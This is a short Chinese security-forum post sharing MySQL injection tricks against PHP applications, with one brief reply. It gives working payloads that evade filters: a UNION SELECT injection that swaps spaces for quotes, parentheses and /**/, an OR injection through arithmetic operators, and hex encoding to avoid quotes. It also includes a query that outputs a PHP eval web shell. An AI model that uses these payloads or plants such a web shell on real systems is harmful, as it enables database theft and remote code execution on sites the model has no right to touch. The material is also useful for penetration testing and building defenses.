首页
社区
课程
招聘
[原创]mysql注入的一些小技巧
发表于: 2017-6-2 09:18 4115

[原创]mysql注入的一些小技巧

2017-6-2 09:18
4115

总结一些小技巧,欢迎指正

版本5.5.53

测试表结构

 

测试数据

 

1.过滤空格的

技巧:字符串加上引号不需要空格,数字加上括号不需要空格,/**/也能代替空格

Php:SELECT * FROM `test` WHERE `name`='$name' and `age`=18

Mysql:SELECT * FROM `test` WHERE `name`='1'or'1'union/**/select(1),(2),(3)from`test1`where(1)--'' and `age`=22

参数:$name=1'or'1'union/**/select(1),(2),(3)from`test1`where(1)--'

 

PS:不能控制整个整数的时候

技巧:用运算符连接+-*/

Php:SELECT * FROM `test` WHERE `age`=1$age and `name`!='wangwu'

Mysql:SELECT * FROM `test` WHERE `age`=1+(1)or(1) and `name`!='wangwu'

参数:$age=+(1)or(1)

2.过滤引号的

技巧:用十六进制代替字符串(select的内容 参数内容都可以使用)

:select ' <?php @eval($_POST[value]);?>' from `test` where `name`='wangwu'


[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 180
活跃值: (524)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
2
打破0回复,顶一个。
2017-6-6 23:52
0
游客
登录 | 注册 方可回帖
返回
//